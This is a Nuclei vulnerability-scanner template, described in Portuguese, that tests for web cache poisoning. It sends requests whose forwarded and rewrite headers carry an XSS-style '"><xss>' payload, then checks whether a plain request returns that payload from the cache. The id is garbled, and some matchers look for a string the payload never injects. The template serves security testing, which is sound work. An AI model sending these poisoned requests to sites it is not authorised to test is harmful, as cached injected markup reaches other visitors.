id: cache-cache_xsfor_solo_traversal1222d111222222222222sdsd

info:
  name: Cache Poisoning cache_xsfor_solo_traversal1222d111222222222222sdsd
  author: xandsz
  severity: medium
  description: |
    Detecta possíveis vulnerabilidades de cache poisoning explorando cabeçalhos manipulados que podem impactar a resposta do servidor, verificando se a resposta é armazenada em cache.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  metadata:
    max-request: 3
  tags: cache, poisoning, fuzzer

http:
  # Primeira requisição com cabeçalhos manipulados
  - raw:
      - |
        GET /;%2f?cb=1111 HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-Prefix: "><xss>"
        X-Forwarded-For: "><xss>"
        X-Original-URL: "><xss>"
        X-Rewrite-URL: "><xss>"
        X-Forwarded-Server: "server-header"><xss>"
        X-Forwarded-Proto: "https"><xss>"
        X-Real-IP: "192.168.1.100"><xss>"
        X-Requested-With: "XMLHttpRequest"><xss>"
        Referer: "><xss>"
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
        X-Forwarded-Scheme: "><xss>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'mizera44'
      - type: word
        words:
          - "text/html"
        part: header
      - type: status
        status:
          - 200

  # Segunda requisição com cabeçalhos manipulados
  - raw:
      - |
        GET /;%2f?cb=1111 HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-Prefix: "><xss>"
        X-Forwarded-For: "><xss>"
        X-Original-URL: "><xss>"
        X-Rewrite-URL: "><xss>"
        X-Forwarded-Server: "server-header"><xss>"
        X-Forwarded-Proto: "https"><xss>"
        X-Real-IP: "192.168.1.100"><xss>"
        X-Requested-With: "XMLHttpRequest"><xss>"
        Referer: "><xss>"
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
        X-Forwarded-Scheme: "><xss>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'mizera44'
      - type: word
        words:
          - "text/html"
        part: header
      - type: status
        status:
          - 200

  # Terceira requisição para verificar se o XSS é refletido do cache
  - raw:
      - |
        GET /;%2f?cb=1111 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><xss>'
      - type: word
        words:
          - "text/html"
        part: header
      - type: status
        status:
          - 200
